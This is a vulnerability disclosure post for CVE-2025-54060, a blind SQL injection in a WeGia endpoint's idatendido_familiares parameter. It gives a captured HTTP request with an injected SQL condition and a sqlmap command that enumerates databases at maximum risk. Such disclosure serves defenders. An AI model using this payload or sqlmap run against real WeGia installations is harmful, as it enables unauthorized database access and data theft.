Featured image of post CVE-2025-54060
SQL Injection Critical WeGia Security WebApp

CVE-2025-54060

SQL Injection

CVE-2025-54060: SQL Injection (Blind Time-Based) Vulnerability in idatendido_familiares Parameter on dependente_editarInfoPessoal.php Endpoint

CVE Publication: https://www.cve.org/CVERecord?id=CVE-2025-54060

Summary

A SQL Injection vulnerability was discovered in the idatendido_familiares parameter of the /html/funcionario/dependente_editarInfoPessoal.php endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.

Details

The application fails to properly sanitize user-supplied input in the idatendido_familiares parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.

PoC

Vulnerable Endpoint: /html/funcionario/dependente_editarInfoPessoal.php

Parameter: idatendido_familiares

Save the request in req.txt file:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20

  POST /html/funcionario/dependente_editarInfoPessoal.php?id_pessoa=3&idatendido_familiares=1+AND+7539=7538 HTTP/1.1
  Host: demo.wegia.org
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate, br, zstd
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 119
  Origin: https://demo.wegia.org
  Connection: keep-alive
  Referer: https://demo.wegia.org/html/funcionario/profile_dependente.php?id_dependente=1
  Cookie: _ga_F8DXBXLV8J=GS2.1.s1751254790$o22$g1$t1751255920$j46$l0$h0; _ga=GA1.1.424189364.1749063834; PHPSESSID=bv1jv0i5nijrv1a3dkkimbp270
  Upgrade-Insecure-Requests: 1
  Sec-Fetch-Dest: document
  Sec-Fetch-Mode: navigate
  Sec-Fetch-Site: same-origin
  Sec-Fetch-User: ?1
  Priority: u=0, i

  nome=Maria&sobrenomeForm=Silva&gender=f&telefone=%2821%2998652-3758&nascimento=1996-04-04&nome_pai=teste&nome_mae=teste

Then, use sqlmap:

1

  sqlmap -r req.txt -p idatendido_familiares --risk=3 --level=5 --dbs --batch --dbms=mysql --batch

Impact

  • Unauthorized access to sensitive data (e.g., users, passwords, logs).
  • Database enumeration (schemas, tables, users, versions).
  • Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).
  • Full compromise of the application if chained with other vulnerabilities.
  • This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.

Reference

https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-mw78-c4f6-2hq7

Finder

Marcelo Queiroz

Contributor

Natan Maia Morette

By: CVE-Hunters

© 2020 - 2025 CVE-Hunters
Built with Hugo
Theme Stack designed by Jimmy